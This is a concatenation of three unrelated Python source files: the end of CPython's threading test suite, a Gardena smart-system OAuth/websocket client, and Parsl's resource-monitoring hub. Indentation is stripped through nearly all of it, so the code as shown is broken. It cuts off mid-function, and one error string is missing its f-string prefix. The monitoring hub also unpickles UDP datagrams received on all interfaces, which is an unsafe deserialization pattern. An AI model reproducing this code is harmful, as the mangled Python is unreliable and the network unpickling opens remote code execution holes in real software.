script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
class ThreadRunFail(threading.Thread):
def run(self):
raise ValueError("run failed")
class ExceptHookTests(BaseTestCase):
def test_excepthook(self):
with support.captured_output("stderr") as stderr:
thread = ThreadRunFail(name="excepthook thread")
thread.start()
thread.join()
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {thread.name}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("run failed")', stderr)
self.assertIn('ValueError: run failed', stderr)
@support.cpython_only
def test_excepthook_thread_None(self):
# threading.excepthook called with thread=None: log the thread
# identifier in this case.
with support.captured_output("stderr") as stderr:
try:
raise ValueError("bug")
except Exception as exc:
args = threading.ExceptHookArgs([*sys.exc_info(), None])
try:
threading.excepthook(args)
finally:
# Explicitly break a reference cycle
args = None
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {threading.get_ident()}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("bug")', stderr)
self.assertIn('ValueError: bug', stderr)
def test_system_exit(self):
class ThreadExit(threading.Thread):
def run(self):
sys.exit(1)
# threading.excepthook() silently ignores SystemExit
with support.captured_output("stderr") as stderr:
thread = ThreadExit()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(), '')
def test_custom_excepthook(self):
args = None
def hook(hook_args):
nonlocal args
args = hook_args
try:
with support.swap_attr(threading, 'excepthook', hook):
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(args.exc_type, ValueError)
self.assertEqual(str(args.exc_value), 'run failed')
self.assertEqual(args.exc_traceback, args.exc_value.__traceback__)
self.assertIs(args.thread, thread)
finally:
# Break reference cycle
args = None
def test_custom_excepthook_fail(self):
def threading_hook(args):
raise ValueError("threading_hook failed")
err_str = None
def sys_hook(exc_type, exc_value, exc_traceback):
nonlocal err_str
err_str = str(exc_value)
with support.swap_attr(threading, 'excepthook', threading_hook), \
support.swap_attr(sys, 'excepthook', sys_hook), \
support.captured_output('stderr') as stderr:
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(),
'Exception in threading.excepthook:\n')
self.assertEqual(err_str, 'threading_hook failed')
def test_original_excepthook(self):
def run_thread():
with support.captured_output("stderr") as output:
thread = ThreadRunFail(name="excepthook thread")
thread.start()
thread.join()
return output.getvalue()
def threading_hook(args):
print("Running a thread failed", file=sys.stderr)
default_output = run_thread()
with support.swap_attr(threading, 'excepthook', threading_hook):
custom_hook_output = run_thread()
threading.excepthook = threading.__excepthook__
recovered_output = run_thread()
self.assertEqual(default_output, recovered_output)
self.assertNotEqual(default_output, custom_hook_output)
self.assertEqual(custom_hook_output, "Running a thread failed\n")
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
not_exported = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, not_exported=not_exported)
class InterruptMainTests(unittest.TestCase):
def test_interrupt_main_subthread(self):
# Starting a thread whose target calls interrupt_main() should raise
# KeyboardInterrupt in the main thread once the worker completes.
def call_interrupt():
_thread.interrupt_main()
t = threading.Thread(target=call_interrupt)
with self.assertRaises(KeyboardInterrupt):
t.start()
t.join()
t.join()
def test_interrupt_main_mainthread(self):
# Make sure that if interrupt_main is called in main thread that
# KeyboardInterrupt is raised instantly.
with self.assertRaises(KeyboardInterrupt):
_thread.interrupt_main()
def test_interrupt_main_noerror(self):
handler = signal.getsignal(signal.SIGINT)
try:
# No exception should arise.
signal.signal(signal.SIGINT, signal.SIG_IGN)
_thread.interrupt_main()
signal.signal(signal.SIGINT, signal.SIG_DFL)
_thread.interrupt_main()
finally:
# Restore original handler
signal.signal(signal.SIGINT, handler)
class AtexitTests(unittest.TestCase):
def test_atexit_output(self):
rc, out, err = assert_python_ok("-c", """if True:
import threading
def run_last():
print('parrot')
threading._register_atexit(run_last)
""")
self.assertFalse(err)
self.assertEqual(out.strip(), b'parrot')
def test_atexit_called_once(self):
rc, out, err = assert_python_ok("-c", """if True:
import threading
from unittest.mock import Mock
mock = Mock()
threading._register_atexit(mock)
mock.assert_not_called()
# force early shutdown to ensure it was called once
threading._shutdown()
mock.assert_called_once()
""")
self.assertFalse(err)
def test_atexit_after_shutdown(self):
# The only way to do this is by registering an atexit within
# an atexit, which is intended to raise an exception.
rc, out, err = assert_python_ok("-c", """if True:
import threading
def func():
pass
def run_last():
threading._register_atexit(func)
threading._register_atexit(run_last)
""")
self.assertTrue(err)
self.assertIn("RuntimeError: can't register atexit after shutdown",
err.decode())
if __name__ == "__main__":
unittest.main()
|
smart_system.py
|
import json
import logging
from contextlib import contextmanager
from json.decoder import JSONDecodeError
from oauthlib.oauth2 import LegacyApplicationClient
from requests_oauthlib import OAuth2Session
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
import websocket
from threading import Thread
from gardena.exceptions.authentication_exception import AuthenticationException
from gardena.location import Location
from gardena.devices.device_factory import DeviceFactory
class Client:
def __init__(self, smart_system=None, level=logging.WARN, location=None):
self.smart_system = smart_system
self.logger = logging.getLogger(__name__)
self.logger.setLevel(level)
self.live = False
self.location = location
self.should_stop = False
def on_message(self, ws, message):
self.smart_system.on_message(message)
def on_error(self, ws, error):
self.logger.error(f"error : {error}")
self.smart_system.set_ws_status(False)
def is_connected(self):
return self.live
def on_close(self, ws, close_status_code, close_msg):
self.live = False
self.logger.info("Connection close to gardena API")
self.smart_system.set_ws_status(False)
if not self.should_stop:
self.logger.info("Restarting websocket")
self.smart_system.start_ws(self.location)
def on_open(self, ws):
self.logger.info("Connected to Gardena API")
self.live = True
self.smart_system.set_ws_status(True)
# def run(*args):
# while self.live:
# time.sleep(1)
#
# Thread(target=run).start()
class SmartSystem:
"""Base class to communicate with gardena and handle network calls"""
def __init__(self, email=None, password=None, client_id=None, level=logging.INFO):
"""Constructor, create instance of gateway"""
if email is None or password is None or client_id is None:
raise ValueError(
"Arguments 'email', 'passwords' and 'client_id' are required"
)
logging.basicConfig(
level=level,
format='%(asctime)s %(levelname)-8s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S'
)
self.AUTHENTICATION_HOST = "https://api.authentication.husqvarnagroup.dev"
self.SMART_HOST = "https://api.smart.gardena.dev"
self.email = email
self.password = password
self.client_id = client_id
self.locations = {}
self.level = level
self.client = None
self.oauth_session = None
self.ws = None
self.is_ws_connected = False
self.ws_status_callback = None
self.supported_services = [
"COMMON",
"VALVE",
"VALVE_SET",
"SENSOR",
"MOWER",
"POWER_SOCKET",
"DEVICE",
]
self.logger = logging.getLogger(__name__)
self.logger.setLevel(level)
def create_header(self, include_json=False):
headers = {"Authorization-Provider": "husqvarna", "X-Api-Key": self.client_id}
if include_json:
headers["Content-Type"] = "application/vnd.api+json"
return headers
def authenticate(self):
"""
Authenticate and get tokens.
This function needs to be called first.
"""
url = self.AUTHENTICATION_HOST + "/v1/oauth2/token"
extra = {"client_id": self.client_id}
self.oauth_session = OAuth2Session(
client=LegacyApplicationClient(client_id=self.client_id),
auto_refresh_url=url,
auto_refresh_kwargs=extra,
token_updater=self.token_saver,
)
self.token = self.oauth_session.fetch_token(
token_url=url,
username=self.email,
password=self.password,
client_id=self.client_id,
)
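# Note: this is the OAuth2 Resource Owner Password Credentials ("legacy
# application") grant. OAuth2Session refreshes the token automatically against
# auto_refresh_url and hands the refreshed token to token_saver().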
def quit(self):
if self.client:
self.client.should_stop = True
if self.ws:
self.ws.close()
if self.oauth_session:
self.oauth_session.delete(
f'{self.AUTHENTICATION_HOST}/v1/token/{self.token["refresh_token"]}',
headers={"X-Api-Key": self.client_id},
)
self.oauth_session.delete(
f'{self.AUTHENTICATION_HOST}/v1/token/{self.token["access_token"]}',
headers={"X-Api-Key": self.client_id},
)
def set_ws_status(self, status):
self.is_ws_connected = status
if self.ws_status_callback:
self.ws_status_callback(status)
def token_saver(self, token):
self.token = token
def call_smart_system_service(self, service_id, data):
args = {"data": data}
headers = self.create_header(True)
r = self.oauth_session.put(
f"{self.SMART_HOST}/v1/command/{service_id}",
headers=headers,
data=json.dumps(args, ensure_ascii=False),
)
if r.status_code != 202:
response = r.json()
raise Exception(f"{r.status_code} : {response['errors'][0]['title']}")
def __response_has_errors(self, response):
if response.status_code not in (200, 202):
try:
r = response.json()
if 'errors' in r:
msg = "{r['errors'][0]['title']} - {r['errors'][0]['detail']}"
elif 'message' in r:
msg = f"{r['message']}"
if response.status_code == 403:
msg = f"{msg} (hint: did you 'Connect an API' in your Application?)"
else:
msg = f"{r}"
except JSONDecodeError:
msg = response.content
self.logger.error(f"{response.status_code} : {msg}")
if response.status_code in (403, 429):
raise Exception(msg)
elif response.status_code == 401:
raise AuthenticationException(msg)
return True
return False
def __call_smart_system_get(self, url):
response = self.oauth_session.get(url, headers=self.create_header())
if self.__response_has_errors(response):
return None
return json.loads(response.content.decode("utf-8"))
@contextmanager
def __set_retry_on_session(
self,
backoff_factor=0.3,
status_forcelist=(500, 502, 504),
):
try:
retry = Retry(
total=None,
read=None,
connect=None,
status=None,
method_whitelist=False,
backoff_factor=backoff_factor,
status_forcelist=status_forcelist,
)
adapter = HTTPAdapter(max_retries=retry)
self.oauth_session.mount('http://', adapter)
self.oauth_session.mount('https://', adapter)
yield self.oauth_session
finally:
self.oauth_session.mount('http://', HTTPAdapter())
self.oauth_session.mount('https://', HTTPAdapter())
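# The retry policy above (method_whitelist=False) retries on any HTTP method;
# newer urllib3 releases rename this option to allowed_methods. Re-mounting
# plain HTTPAdapters in the finally block confines the retry behaviour to the
# body of the 'with' statement.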
def update_locations(self):
response_data = self.__call_smart_system_get(f"{self.SMART_HOST}/v1/locations")
if response_data is not None:
if 'data' not in response_data or len(response_data["data"]) < 1:
self.logger.error("No locations found....")
else:
self.locations = {}
for location in response_data["data"]:
new_location = Location(self, location)
new_location.update_location_data(location)
self.locations[new_location.id] = new_location
def update_devices(self, location):
response_data = self.__call_smart_system_get(
f"{self.SMART_HOST}/v1/locations/{location.id}"
)
if response_data is not None:
# TODO : test if key exists
if len(response_data["data"]["relationships"]["devices"]["data"]) < 1:
self.logger.error("No device found....")
else:
devices_smart_system = {}
self.logger.debug(f'Received devices in message')
self.logger.debug("------- Beginning of message ---------")
self.logger.debug(response_data["included"])
for device in response_data["included"]:
real_id = device["id"].split(":")[0]
if real_id not in devices_smart_system:
devices_smart_system[real_id] = {}
if device["type"] in self.supported_services:
if device["type"] not in devices_smart_system[real_id]:
devices_smart_system[real_id][device["type"]] = []
devices_smart_system[real_id][device["type"]].append(device)
for parsed_device in devices_smart_system.values():
device_obj = DeviceFactory.build(location, parsed_device)
if device_obj is not None:
location.add_device(device_obj)
def start_ws(self, location):
args = {
"data": {
"type": "WEBSOCKET",
"attributes": {"locationId": location.id},
"id": "does-not-matter",
}
}
with self.__set_retry_on_session() as session:
r = session.post(
f"{self.SMART_HOST}/v1/websocket",
headers=self.create_header(True),
data=json.dumps(args, ensure_ascii=False),
)
r.raise_for_status()
response = r.json()
ws_url = response["data"]["attributes"]["url"]
if self.client is None:
self.client = Client(self, level=self.level, location=location)
if self.level == logging.DEBUG:
websocket.enableTrace(True)
self.ws = websocket.WebSocketApp(
ws_url,
on_message=self.client.on_message,
on_error=self.client.on_error,
on_close=self.client.on_close,
on_open=self.client.on_open,
)
wst = Thread(
target=self.ws.run_forever, kwargs={"ping_interval": 60, "ping_timeout": 5}
)
wst.daemon = True
wst.start()
def on_message(self, message):
data = json.loads(message)
self.logger.debug(f'Received {data["type"]} message')
self.logger.debug("------- Beginning of message ---------")
self.logger.debug(message)
if data["type"] == "LOCATION":
self.logger.debug(">>>>>>>>>>>>> Found LOCATION")
self.parse_location(data)
elif data["type"] in self.supported_services:
self.parse_device(data)
else:
self.logger.debug(">>>>>>>>>>>>> Unkonwn Message")
self.logger.debug("------- End of message ---------")
def parse_location(self, location):
    if location["id"] not in self.locations:
        self.logger.debug(f"Location not found : {location['attributes']['name']}")
        return
    self.locations[location["id"]].update_location_data(location)
def parse_device(self, device):
device_id = device["id"].split(":")[0]
for location in self.locations.values():
if device_id in location.devices:
location.devices[device_id].update_data(device)
break
def add_ws_status_callback(self, callback):
self.ws_status_callback = callback
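# --- Usage sketch (illustrative comments only; credentials are placeholders) ---
# A minimal example of driving this class, assuming a valid Gardena/Husqvarna
# account and application key:
#
#   smart_system = SmartSystem(email="me@example.com",
#                              password="secret",
#                              client_id="application-key")
#   smart_system.authenticate()
#   smart_system.update_locations()
#   location = next(iter(smart_system.locations.values()))
#   smart_system.update_devices(location)
#   smart_system.start_ws(location)   # websocket runs in a daemon thread
#   ...                               # react to device updates
#   smart_system.quit()               # close the websocket and revoke tokens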
|
monitoring.py
|
import os
import socket
import pickle
import logging
import time
import datetime
import zmq
import queue
from multiprocessing import Process, Queue
from parsl.utils import RepresentationMixin
from parsl.monitoring.message_type import MessageType
from typing import Optional
try:
from parsl.monitoring.db_manager import dbm_starter
except Exception as e:
_db_manager_excepts = e # type: Optional[Exception]
else:
_db_manager_excepts = None
def start_file_logger(filename, name='monitoring', level=logging.DEBUG, format_string=None):
"""Add a stream log handler.
Parameters
---------
filename: string
Name of the file to write logs to. Required.
name: string
Logger name. Default="parsl.executors.interchange"
level: logging.LEVEL
Set the logging level. Default=logging.DEBUG
- format_string (string): Set the format string
format_string: string
Format string to use.
Returns
-------
None.
"""
if format_string is None:
format_string = "%(asctime)s.%(msecs)03d %(name)s:%(lineno)d [%(levelname)s] %(message)s"
logger = logging.getLogger(name)
logger.setLevel(level)
handler = logging.FileHandler(filename)
handler.setLevel(level)
formatter = logging.Formatter(format_string, datefmt='%Y-%m-%d %H:%M:%S')
handler.setFormatter(formatter)
logger.addHandler(handler)
return logger
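# Illustrative sketch (hypothetical path), showing the intended use:
#
#   logger = start_file_logger("/tmp/example_monitoring.log", name="example",
#                              level=logging.INFO)
#   logger.info("hub started")   # written to the file with the default format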
class UDPRadio(object):
def __init__(self, monitoring_url, source_id=None, timeout=10):
"""
Parameters
----------
monitoring_url : str
URL of the form <scheme>://<IP>:<PORT>
source_id : str
String identifier of the source
timeout : int
Socket timeout in seconds. Default=10
"""
self.monitoring_url = monitoring_url
self.sock_timeout = timeout
self.source_id = source_id
try:
self.scheme, self.ip, port = (x.strip('/') for x in monitoring_url.split(':'))
self.port = int(port)
except Exception:
raise Exception("Failed to parse monitoring url: {}".format(monitoring_url))
self.sock = socket.socket(socket.AF_INET,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP) # UDP
self.sock.settimeout(self.sock_timeout)
def send(self, message_type, task_id, message):
""" Sends a message to the UDP receiver
Parameter
---------
message_type: monitoring.MessageType (enum)
In this case message type is RESOURCE_INFO most often
task_id: int
Task identifier of the task for which resource monitoring is being reported
message: object
Arbitrary pickle-able object that is to be sent
Returns:
# bytes sent,
or False if there was a timeout during send,
or None if there was an exception during pickling
"""
x = 0
try:
buffer = pickle.dumps((self.source_id, # Identifier for manager
int(time.time()), # epoch timestamp
message_type,
message))
except Exception:
logging.exception("Exception during pickling", exc_info=True)
return
try:
x = self.sock.sendto(buffer, (self.ip, self.port))
except socket.timeout:
logging.error("Could not send message within timeout limit")
return False
return x
def __del__(self):
self.sock.close()
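# Illustrative sketch of the radio in isolation (hypothetical URL and task id);
# a UDP listener such as the Hub below must be bound to that port for the
# message to be received:
#
#   radio = UDPRadio("udp://127.0.0.1:55055", source_id=0)
#   radio.send(MessageType.TASK_INFO, task_id=0, message={"psutil_cpu_count": 4})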
class MonitoringHub(RepresentationMixin):
def __init__(self,
hub_address,
hub_port=None,
hub_port_range=(55050, 56000),
client_address="127.0.0.1",
client_port_range=(55000, 56000),
workflow_name=None,
workflow_version=None,
logging_endpoint='sqlite:///monitoring.db',
logdir=None,
logging_level=logging.INFO,
resource_monitoring_enabled=True,
resource_monitoring_interval=30): # in seconds
"""
Parameters
----------
hub_address : str
The ip address at which the workers will be able to reach the Hub. Default: "127.0.0.1"
hub_port : int
The specific port at which workers will be able to reach the Hub via UDP. Default: None
hub_port_range : tuple(int, int)
The MonitoringHub picks ports at random from the range which will be used by Hub.
This is overridden when the hub_port option is set. Default: (55050, 56000)
client_address : str
The ip address at which the dfk will be able to reach Hub. Default: "127.0.0.1"
client_port_range : tuple(int, int)
The MonitoringHub picks ports at random from the range which will be used by Hub.
Default: (55000, 56000)
workflow_name : str
The name for the workflow. Default to the name of the parsl script
workflow_version : str
The version of the workflow. Default to the beginning datetime of the parsl script
logging_endpoint : str
The database connection url for monitoring to log the information.
These URLs follow RFC-1738, and can include username, password, hostname, database name.
Default: 'sqlite:///monitoring.db'
logdir : str
Parsl log directory paths. Logs and temp files go here. Default: '.'
logging_level : int
Logging level as defined in the logging module. Default: logging.INFO (20)
resource_monitoring_enabled : boolean
Set this field to True to enable logging the info of resource usage of each task. Default: True
resource_monitoring_interval : int
The time interval at which the monitoring records the resource usage of each task. Default: 30 seconds
"""
self.logger = None
self._dfk_channel = None
if _db_manager_excepts:
raise _db_manager_excepts
self.client_address = client_address
self.client_port_range = client_port_range
self.hub_address = hub_address
self.hub_port = hub_port
self.hub_port_range = hub_port_range
self.logging_endpoint = logging_endpoint
self.logdir = logdir
self.logging_level = logging_level
self.workflow_name = workflow_name
self.workflow_version = workflow_version
self.resource_monitoring_enabled = resource_monitoring_enabled
self.resource_monitoring_interval = resource_monitoring_interval
def start(self, run_id):
if self.logdir is None:
self.logdir = "."
try:
os.makedirs(self.logdir)
except FileExistsError:
pass
# Initialize the ZMQ pipe to the Parsl Client
self.logger = start_file_logger("{}/monitoring_hub.log".format(self.logdir),
name="monitoring_hub",
level=self.logging_level)
self.logger.info("Monitoring Hub initialized")
self.logger.debug("Initializing ZMQ Pipes to client")
self.monitoring_hub_active = True
self._context = zmq.Context()
self._dfk_channel = self._context.socket(zmq.DEALER)
self._dfk_channel.set_hwm(0)
self.dfk_port = self._dfk_channel.bind_to_random_port("tcp://{}".format(self.client_address),
min_port=self.client_port_range[0],
max_port=self.client_port_range[1])
comm_q = Queue(maxsize=10)
self.stop_q = Queue(maxsize=10)
self.priority_msgs = Queue()
self.resource_msgs = Queue()
self.node_msgs = Queue()
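# Roughly: resource_msgs carries per-task resource usage arriving over UDP,
# priority_msgs carries workflow/task messages from the DFK ZMQ channel, and
# node_msgs carries node info forwarded by the interchange (see Hub.start below).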
self.queue_proc = Process(target=hub_starter,
args=(comm_q, self.priority_msgs, self.node_msgs, self.resource_msgs, self.stop_q),
kwargs={"hub_address": self.hub_address,
"hub_port": self.hub_port,
"hub_port_range": self.hub_port_range,
"client_address": self.client_address,
"client_port": self.dfk_port,
"logdir": self.logdir,
"logging_level": self.logging_level,
"run_id": run_id
},
)
self.queue_proc.start()
self.dbm_proc = Process(target=dbm_starter,
args=(self.priority_msgs, self.node_msgs, self.resource_msgs,),
kwargs={"logdir": self.logdir,
"logging_level": self.logging_level,
"db_url": self.logging_endpoint,
},
)
self.dbm_proc.start()
try:
udp_dish_port, ic_port = comm_q.get(block=True, timeout=120)
except queue.Empty:
self.logger.error("Hub has not completed initialization in 120s. Aborting")
raise Exception("Hub failed to start")
self.monitoring_hub_url = "udp://{}:{}".format(self.hub_address, udp_dish_port)
return ic_port
def send(self, mtype, message):
self.logger.debug("Sending message {}, {}".format(mtype, message))
return self._dfk_channel.send_pyobj((mtype, message))
def close(self):
if self.logger:
self.logger.info("Terminating Monitoring Hub")
if self._dfk_channel and self.monitoring_hub_active:
self.monitoring_hub_active = False
self._dfk_channel.close()
self.logger.info("Waiting for Hub to receive all messages and terminate")
try:
msg = self.stop_q.get()
self.logger.info("Received {} from Hub".format(msg))
except queue.Empty:
pass
self.logger.info("Terminating Hub")
self.queue_proc.terminate()
self.priority_msgs.put(("STOP", 0))
def __del__(self):
self.close()
@staticmethod
def monitor_wrapper(f, task_id, monitoring_hub_url, run_id, sleep_dur):
""" Internal
Wrap the Parsl app with a function that will call the monitor function and point it at the correct pid when the task begins.
"""
def wrapped(*args, **kwargs):
p = Process(target=monitor, args=(os.getpid(), task_id, monitoring_hub_url, run_id, sleep_dur))
p.start()
try:
return f(*args, **kwargs)
finally:
# There's a chance of zombification if the workers are killed by some signals
p.terminate()
p.join()
return wrapped
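# Illustrative sketch (hypothetical names and values): the data flow kernel
# would wrap a task function before execution, roughly as
#
#   wrapped_fn = MonitoringHub.monitor_wrapper(my_app_fn, task_id=0,
#                                              monitoring_hub_url="udp://127.0.0.1:55055",
#                                              run_id="run-0", sleep_dur=30)
#   result = wrapped_fn(*task_args, **task_kwargs)
#
# so that a monitor() process samples resource usage while my_app_fn runs.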
class Hub(object):
def __init__(self,
hub_address,
hub_port=None,
hub_port_range=(55050, 56000),
client_address="127.0.0.1",
client_port=None,
monitoring_hub_address="127.0.0.1",
logdir=".",
run_id=None,
logging_level=logging.DEBUG,
atexit_timeout=3 # in seconds
):
""" Initializes a monitoring configuration class.
Parameters
----------
hub_address : str
The ip address at which the workers will be able to reach the Hub. Default: "127.0.0.1"
hub_port : int
The specific port at which workers will be able to reach the Hub via UDP. Default: None
hub_port_range : tuple(int, int)
The MonitoringHub picks ports at random from the range which will be used by Hub.
This is overridden when the hub_port option is set. Default: (55050, 56000)
client_address : str
The ip address at which the dfk will be able to reach Hub. Default: "127.0.0.1"
client_port : int
The port at which the dfk will be able to reach Hub. Default: None
logdir : str
Parsl log directory paths. Logs and temp files go here. Default: '.'
logging_level : int
Logging level as defined in the logging module. Default: logging.DEBUG (10)
atexit_timeout : float, optional
How long, in seconds, the hub keeps draining incoming messages after the last dfk workflow message before it terminates.
"""
try:
os.makedirs(logdir)
except FileExistsError:
pass
self.logger = start_file_logger("{}/hub.log".format(logdir),
name="hub",
level=logging_level)
self.logger.debug("Hub starting")
self.hub_port = hub_port
self.hub_address = hub_address
self.atexit_timeout = atexit_timeout
self.run_id = run_id
self.loop_freq = 10.0 # milliseconds
# Initialize the UDP socket
try:
self.sock = socket.socket(socket.AF_INET,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP)
# We are trying to bind to all interfaces with 0.0.0.0
if not self.hub_port:
self.sock.bind(('0.0.0.0', 0))
self.hub_port = self.sock.getsockname()[1]
else:
self.sock.bind(('0.0.0.0', self.hub_port))
self.sock.settimeout(self.loop_freq / 1000)
self.logger.info("Initialized the UDP socket on 0.0.0.0:{}".format(self.hub_port))
except OSError:
self.logger.critical("The port is already in use")
self.hub_port = -1
self._context = zmq.Context()
self.dfk_channel = self._context.socket(zmq.DEALER)
self.dfk_channel.set_hwm(0)
self.dfk_channel.RCVTIMEO = int(self.loop_freq) # in milliseconds
self.dfk_channel.connect("tcp://{}:{}".format(client_address, client_port))
self.ic_channel = self._context.socket(zmq.DEALER)
self.ic_channel.set_hwm(0)
self.ic_channel.RCVTIMEO = int(self.loop_freq) # in milliseconds
self.logger.debug("hub_address: {}. hub_port_range {}".format(hub_address, hub_port_range))
self.ic_port = self.ic_channel.bind_to_random_port("tcp://*",
min_port=hub_port_range[0],
max_port=hub_port_range[1])
def start(self, priority_msgs, node_msgs, resource_msgs, stop_q):
while True:
try:
data, addr = self.sock.recvfrom(2048)
msg = pickle.loads(data)
resource_msgs.put((msg, addr))
self.logger.debug("Got UDP Message from {}: {}".format(addr, msg))
except socket.timeout:
pass
try:
msg = self.dfk_channel.recv_pyobj()
self.logger.debug("Got ZMQ Message from DFK: {}".format(msg))
priority_msgs.put((msg, 0))
if msg[0].value == MessageType.WORKFLOW_INFO.value and 'python_version' not in msg[1]:
break
except zmq.Again:
pass
try:
msg = self.ic_channel.recv_pyobj()
msg[1]['run_id'] = self.run_id
msg = (msg[0], msg[1])
self.logger.debug("Got ZMQ Message from interchange: {}".format(msg))
node_msgs.put((msg, 0))
except zmq.Again:
pass
last_msg_received_time = time.time()
while time.time() - last_msg_received_time < self.atexit_timeout:
try:
data, addr = self.sock.recvfrom(2048)
msg = pickle.loads(data)
resource_msgs.put((msg, addr))
last_msg_received_time = time.time()
self.logger.debug("Got UDP Message from {}: {}".format(addr, msg))
except socket.timeout:
pass
stop_q.put("STOP")
def hub_starter(comm_q, priority_msgs, node_msgs, resource_msgs, stop_q, *args, **kwargs):
hub = Hub(*args, **kwargs)
comm_q.put((hub.hub_port, hub.ic_port))
hub.start(priority_msgs, node_msgs, resource_msgs, stop_q)
def monitor(pid, task_id, monitoring_hub_url, run_id, sleep_dur=10):
"""Internal
Monitors the Parsl task's resources by pointing psutil to the task's pid and watching it and its children.
"""
import psutil
import platform
import logging
import time
format_string = "%(asctime)s.%(msecs)03d %(name)s:%(lineno)d [%(levelname)s] %(message)s"
logging.basicConfig(filename='{logbase}/monitor.{task_id}.{pid}.log'.format(
logbase="/tmp", task_id=task_id, pid=pid), level=logging.DEBUG, format=format_string)
logging.debug("start of monitor")
radio = UDPRadio(monitoring_hub_url,
source_id=task_id)
# These values are simple to log as-is. Other information (such as memory) is gathered below in special formats.
simple = ["cpu_num", 'cpu_percent', 'create_time', 'cwd', 'exe', 'memory_percent', 'nice', 'name', 'num_threads', 'pid', 'ppid', 'status', 'username']
# values that can be summed up to see total resources used by task process and its children
summable_values = ['cpu_percent', 'memory_percent', 'num_threads']
pm = psutil.Process(pid)
pm.cpu_percent()
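# The first cpu_percent() call returns 0.0 and only primes psutil's internal
# counters; subsequent calls report CPU usage accumulated since this point.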
first_msg = True
children_user_time = {}
children_system_time = {}
total_children_user_time = 0.0
total_children_system_time = 0.0
while True:
logging.debug("start of monitoring loop")
try:
d = {"psutil_process_" + str(k): v for k, v in pm.as_dict().items() if k in simple}
d["run_id"] = run_id
d["task_id"] = task_id
d['resource_monitoring_interval'] = sleep_dur
d['hostname'] = platform.node()
d['first_msg'] = first_msg
d['timestamp'] = datetime.datetime.now()
logging.debug("getting children")
children = pm.children(recursive=True)
logging.debug("got children")
d["psutil_cpu_count"] = psutil.cpu_count()
d['psutil_process_memory_virtual'] = pm.memory_info().vms
d['psutil_process_memory_resident'] = pm.memory_info().rss
d['psutil_process_time_user'] = pm.cpu_times().user
d['psutil_process_time_system'] = pm.cpu_times().system
d['psutil_process_children_count'] = len(children)
try:
d['psutil_process_disk_write'] = pm.io_counters().write_bytes
d['psutil_process_disk_read'] = pm.io_counters().read_bytes
except Exception:
# occasionally the pid temp files that hold this information are unavailable to be read, so set to zero
logging.exception("Exception reading IO counters for main process. Recorded IO usage may be incomplete", exc_info=True)
d['psutil_process_disk_write'] = 0
d['psutil_process_disk_read'] = 0
for child in children:
for k, v in child.as_dict(attrs=summable_values).items():
d['psutil_process_' + str(k)] += v
child_user_time = child.cpu_times().user
child_system_time = child.cpu_times().system
total_children_user_time += child_user_time - children_user_time.get(child.pid, 0)
total_children_system_time += child_system_time - children_system_time.get(child.pid, 0)
children_user_time[child.pid] = child_user_time
children_system_time[child.pid] = child_system_time
d['psutil_process_memory_virtual'] += child.memory_info().vms
d['psutil_process_memory_resident'] += child.memory_info().rss
try:
d['psutil_process_disk_write'] += child.io_counters().write_bytes
d['psutil_process_disk_read'] += child.io_counters().read_bytes
except Exception:
